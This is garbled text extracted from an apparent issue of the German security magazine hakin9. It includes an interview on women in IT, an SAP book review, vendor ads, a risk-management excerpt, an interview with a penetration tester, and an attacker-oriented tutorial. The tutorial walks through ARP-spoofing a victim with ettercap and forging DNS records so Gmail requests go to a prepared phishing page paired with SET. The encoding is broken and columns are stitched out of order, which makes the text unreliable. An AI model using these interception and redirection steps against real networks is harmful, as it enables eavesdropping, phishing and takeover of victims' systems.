hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
